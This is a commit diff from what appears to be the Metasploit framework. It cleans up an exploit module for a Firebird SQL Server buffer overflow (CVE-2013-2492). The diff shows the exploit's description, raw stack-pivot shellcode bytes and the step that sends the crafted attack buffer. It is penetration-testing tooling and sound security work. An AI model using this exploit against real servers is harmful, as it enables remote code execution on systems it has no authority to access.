cleanup for fb_cnct_group

jvazquez-r7 · jvazquez-r7 · commit ab44e3e64335 · 2013-03-07T21:34:07.000+01:00
diff --git a/modules/exploits/windows/misc/fb_cnct_group.rb b/modules/exploits/windows/misc/fb_cnct_group.rb
@@ -15,24 +15,22 @@ def initialize
 		super(
 			'Name'           => 'Firebird Relational Database CNCT Group Number Buffer Overflow',
 			'Description'    => %q{
-				This module exploits a vulnerability in Firebird SQL Server.  A
-			specially crafted packet can be sent which will overwrite a pointer
-			allowing the attacker to control where data is read from.  Shortly following
-			the controlled read, the pointer is called resulting in code execution.
-
-			The vulnerability exists with a group number is extracted from the CNCT information
-			which is sent by the client and the size is not properly checked.
-
-			This module utilizes an existing call to memcpy just prior to the vulnerable exception
-			which allows a small amount of data to be written to the stack.  A small stackpivot is
-			used to execute a small ROP chain which provides a larger stack pivot to a larger ROP
-			chain which ultimately is used to execute VirtualAlloc and bypass DEP.
+					This module exploits a vulnerability in Firebird SQL Server.  A specially
+				crafted packet can be sent which will overwrite a pointer allowing the attacker to
+				control where data is read from.  Shortly, following the controlled read, the
+				pointer is called resulting in code execution.
+
+				The vulnerability exists with a group number extracted from the CNCT information,
+				which is sent by the client, and whose size is not properly checked.
+
+				This module uses an existing call to memcpy, just prior to the vulnerable code,
+				which allows a small amount of data to be written to the stack. A two-phases
+				stackpivot allows to execute the ROP chain which ultimately is used to execute
+				VirtualAlloc and bypass DEP.
 			},
-			'Author'      => [
-				'Spencer McIntyre'
-			],
-			'Arch'        => [ ARCH_X86 ],
-			'Platform'    => [ 'win' ],
+			'Author'      => 'Spencer McIntyre',
+			'Arch'        => ARCH_X86,
+			'Platform'    => 'win',
 			'References'  =>
 				[
 					[ 'CVE', '2013-2492' ]
@@ -43,10 +41,10 @@ def initialize
 				},
 			'Payload'      =>
 				{
-					# mov eax,fs:[0x18] # add eax,8 # mov esp,[eax]
-					'Prepend'         => "\x64\xa1\x18\x00\x00\x00\x83\xc0\x08\x8b\x20",
-					'Space'           => 400,
-					'BadChars'        => "\x00\x0a\x0d",
+					# Stackpivot => mov eax,fs:[0x18] # add eax,8 # mov esp,[eax]
+					'Prepend'  => "\x64\xa1\x18\x00\x00\x00\x83\xc0\x08\x8b\x20",
+					'Space'    => 400,
+					'BadChars' => "\x00\x0a\x0d",
 				},
 			'Targets'     =>
 				[
@@ -234,7 +232,7 @@ def exploit
 		evil_data << final_rop_chain
 		evil_data << payload.encoded
 
-		print_status("#{datastore['RHOST']}:#{datastore['RPORT']} - Sending Connection Request For #{filename}")
+		print_status("#{rhost}:#{rport} - Sending Connection Request For #{filename}")
 		sock.put(evil_data)
 
 		disconnect
